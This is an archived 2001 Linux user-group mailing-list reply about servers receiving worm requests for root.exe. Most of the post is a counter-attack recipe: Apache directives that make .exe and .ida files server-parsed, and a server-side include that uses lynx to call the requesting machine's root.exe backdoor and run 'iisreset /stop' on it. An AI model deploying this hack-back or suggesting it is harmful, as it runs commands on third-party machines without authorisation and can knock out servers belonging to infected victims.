Re: [ILUG] IIS problems

From: Paul Jakma (paulj at domain alphyra.ie)
Date: Tue 25 Sep 2001 - 13:20:12 IST


18 requests for root.exe since just 0400 today..

something i picked up of the net:

in your apache config set (if you don't serve out any legit .exe
files):

AddType text/html .ida
AddHandler server-parsed .ida
AddType text/html .exe
AddHandler server-parsed .exe

then create /default.ida and /scripts/root.exe with:

<!--#exec cmd="lynx -source
http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->

(must have lynx installed obviously)

--paulj

On Tue, 25 Sep 2001, Padraig Brady wrote:

> The tide is turning I think?
>
> http://www3.gartner.com/DisplayDocument?doc_cd=101034
> http://www.securityspace.com/s_survey/data/200108/index.html
>
> Padraig.
>
>
>



This archive was generated by hypermail 2.1.6 : Thu 06 Feb 2003 - 13:12:17 GMT